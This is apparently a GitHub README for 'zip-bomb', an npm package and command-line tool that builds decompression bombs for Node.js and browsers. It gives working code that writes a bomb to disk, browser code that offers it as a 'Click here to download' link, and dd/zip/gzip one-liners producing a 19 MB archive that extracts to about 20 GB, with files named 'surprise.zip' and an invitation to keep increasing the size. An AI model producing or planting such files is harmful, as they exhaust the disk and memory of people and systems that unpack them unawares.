Skip to content

harshjv/zip-bomb

Repository files navigation

πŸ’£ Zip bomb standard travis npm

CAUTION THIS IS JUST AN EXPERIMENT. USE THIS AT YOUR OWN RISK. READ MORE ABOUT ZIP BOMB HERE.

Zip bomb for Browser and Node.js.

⚑️ Live demo here

Installation

npm install zip-bomb

Checkout API usage.

Command line

npm install -g zip-bomb

Usage

Usage: zip-bomb [options]

Options:

  -h, --help                       output usage information
  -V, --version                    output the version number
  -b, --zero-buffer-size <number>  Zero buffer size
  -l, --buffer-level <number>      Buffer multiplier
  -z, --zip-level <number>         Level
  -o, --output <file>              Output file

Example:

    zip-bomb -b 10485760 -l 10 -z 50 -o surprise.zip

API

zipBomb.createBuffer(zeroBufferSize, bufferLevel, zipLevel)

Creates ZIP file Buffer.

returns Promise

Parameters

  • zeroBufferSize
    • can be Number
    • creates buffer of 0s with provided size
  • bufferLevel
    • can be Number
    • multiplies created buffer with zeros with provided buffer level
  • zipLevel
    • creates zip zeroBufferSize * bufferLevel zeros of provided zip level

zipBomb.createDataURL(zeroBufferSize, bufferLevel, zipLevel)

Creates DataURL (for use in browsers)

returns Promise

Parameters

Same as zipBomb.createDataURL(bufferMultiplier, level)

Usage

In Node.js

const fs = require('fs')
const zb = require('zip-bomb')

const fileName = 'zipbomb.zip'

zb.createBuffer(1024 * 1024 * 10, 10, 10)
  .then((buffer) => {
    fs.writeFile(fileName, buffer, (err) => {
      if (err) throw err

      console.log(`${fileName} is created`)
    })
  })

WARNING zipbomb.zip file is evil!

In Browser (with Browserify or webpack)

const zb = require('zip-bomb')

zb.createDataURL(1024 * 1024 * 10, 10, 10)
  .then((dataURL) => {
    const a = document.createElement('a')
    const linkText = document.createTextNode('Click here to download zip bomb')

    a.appendChild(linkText)
    a.href = dataURL
    document.body.appendChild(a)
  })
  .catch((e) => console.error(e))

Embed bundled file into an HTML page and click on the link to download generated zip bomb!

Or open /example/index.html folder in browser.

Debug

In Node.js

Enable debug logs by setting the DEBUG environment variable.

DEBUG=zip-bomb*

In Browser

Enable debug logs by running this in the developer console.

localStorage.debug = 'zip-bomb*'

and then reload.

The Linux Way

dd if=/dev/zero bs=1000 count=20000000 | zip surprise.zip -

or

dd if=/dev/zero bs=1000 count=20000000 | gzip > surprise.gz

Creates around 19 MB file that extracts to around 20 GB file. Keep increasing the count and enjoy!

Test

npm test

standard only for now. More to come.

License

MIT

About

πŸ’£ Zip bomb for Browser and Node.js.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published